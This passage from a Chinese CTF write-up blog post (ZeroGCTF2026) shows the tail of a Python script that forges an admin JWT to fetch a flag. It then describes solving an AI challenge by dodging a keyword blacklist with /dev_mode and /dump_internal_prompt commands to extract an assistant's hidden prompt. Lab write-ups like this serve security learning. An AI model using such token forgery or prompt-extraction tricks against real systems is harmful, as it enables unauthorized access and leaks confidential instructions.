class="keyword">return</span> r.json()[<span class="string">&quot;flag&quot;</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] Fetching public mission file...&quot;</span>)</span><br><span class="line">    key_material = get_public_key_material()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] key material:&quot;</span>, <span class="built_in">repr</span>(key_material))</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] Forging admin JWT...&quot;</span>)</span><br><span class="line">    token = forge_admin_token(key_material)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] token:&quot;</span>, token)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[*] Requesting admin flag...&quot;</span>)</span><br><span class="line">    flag = get_flag(token)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] FLAG:&quot;</span>, flag)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>输出</p>
<p><img src="/post-assets/7002efde61383e8a22eceeaa.webp" alt="图片" /></p>
<h2 id="ai"><a class="markdownIt-Anchor" href="#ai"></a> AI</h2>
<p>其实主要奔着AI题来的</p>
<h3 id="safeassistant-dev-prompt-leak"><a class="markdownIt-Anchor" href="#safeassistant-dev-prompt-leak"></a> SafeAssistant Dev Prompt Leak</h3>
<p><img src="/post-assets/da8f295844c2eeec6d35b735.png" alt="image-20260526205554432" /></p>
<p>给了个附件,但按题目来说应该是没有附件的，黑盒，后面我们可以单独分析一下附件</p>
<p><img src="/post-assets/bb3e885a0815469e339e791f.png" alt="image-20260526205944069" /></p>
<p>据题目所说可能存在关键字黑名单</p>
<p><img src="/post-assets/bd188b6a92783b9668bc4c12.png" alt="image-20260526211030580" /></p>
<p>这里提示版本是SafeAssistant v3.1 - 开发版本</p>
<p>说明当前运行的是开发版，可能存在调试命令</p>
<p><img src="/post-assets/448155807eb0a6b0e8eefa12.png" alt="image-20260526211401324" /></p>
<p>成功进入开发模式（无需认证）</p>
<p>继续用开发者模式尝试更多命令，但避免触发黑名单检测</p>
<p><img src="/post-assets/d157824d2092f970aecefbb6.png" alt="image-20260526211626301" /></p>
<p>请求一次性包含两个子命令：</p>
<ul>
<li><code>/dev_mode</code>：进入开发模式；</li>
<li><code>/dump_internal_prompt</code>：导出内部提示内容。</li>
</ul>
<blockquote>
<p>有点烂，说实话</p>
</blockquote>
<p>看源码：<br />
<img src="/post-assets/99507a530b155130dd7d5fb3.png" alt="image-20260526211948374" /></p>
<p>只有知道了这两个接口才能解出题…</p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/" rel="tag">比赛复现</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/images/124691006_p0_master1200.jpg" data-sizes="auto" alt="LitCTF2026" class="lazyload">
          
        
        <a href="/2026/05/25/LitCTF2026/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            LitCTF2026
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/images/1715139851115171513985117.jpg" data-sizes="auto" alt="CCB2026决赛复现" class="lazyload">
        
      
      <a href="/2026/05/08/CCB2026%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%8E%B0/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          CCB2026决赛复现
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2026
      <span class="footer-info-sep rotate"></span>
      FuB0Y
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        1183.5k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        94:33
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text"> Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#space-notes"><span class="toc-number">1.1.</span> <span class="toc-text"> Space Notes</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#zero-uploadzip-slip-%E8%B7%AF%E5%BE%84%E7%A9%BF%E8%B6%8A"><span class="toc-number">1.2.</span> <span class="toc-text"> Zero Upload(Zip Slip 路径穿越)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#orbit-apikid%E6%B3%A8%E5%85%A5jwt%E4%BC%AA%E9%80%A0"><span class="toc-number">1.3.</span> <span class="toc-text"> Orbit API(KID注入+JWT伪造)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ai"><span class="toc-number">2.</span> <span class="toc-text"> AI</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#safeassistant-dev-prompt-leak"><span class="toc-number">2.1.</span> <span class="toc-text"> SafeAssistant Dev Prompt Leak</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="FuB0Y" class="lazyload">
  <div class="sidebar-author-name">FuB0Y</div>
  <div class="sidebar-description">世所谓英雄者，不以挫抑而灰心，不以失败而退怯</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">382</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">13</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">323</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.0.6/dist/index.umd.js" integrity="sha384-vkGvf25gm1C1PbcoD5dNfc137HzNL&#x2F;hr1RKA5HniJOaawtvUmH5lTVFgFAruE9Ge" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "FuB0Y",
          title: "ZeroGCTF2026",
          url: "https://fub0y2026.github.io/2026/05/25/ZeroGCTF2026/",
          excerpt: "",
          description: "",
          stripContent: " 因为时间原因没打这个比赛，来复现几个觉得有意思的题   Web  Space Notes   存在模板注入 访问&amp;#123;&amp;#123;config&amp;#125;&amp;#125;拿到密钥伪造admin，访问Admin获取flag  Zero Upload(Zip Slip 路径穿越)   文件上传题，常见的有以下思路： 123456789101112131. .php32. .PhP3. 复写 PhPHPp4. .php[ 空格 ]5. .php.6. .php. .7. .php::$DATA8.",
          date: "Mon May 25 2026 23:08:58 GMT+0800",
          updated: "Tue May 26 2026 21:27:09 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.js" integrity="sha384-7zkQWkzuo3B5mTepMUcHkMB5jZaolc2xDwL6VFqjFALcbeS9Ggm&#x2F;Yr2r3Dy4lfFg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/contrib/auto-render.min.js" integrity="sha384-43gviWU0YVjaDtb&#x2F;GhzOouOXtZMP&#x2F;7XUzwPTstBeZFe&#x2F;+rCMvRwr4yROQP43s0Xk" crossorigin="anonymous" defer onload="renderMathInElement(document.body, {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  





  </body>
  </html>

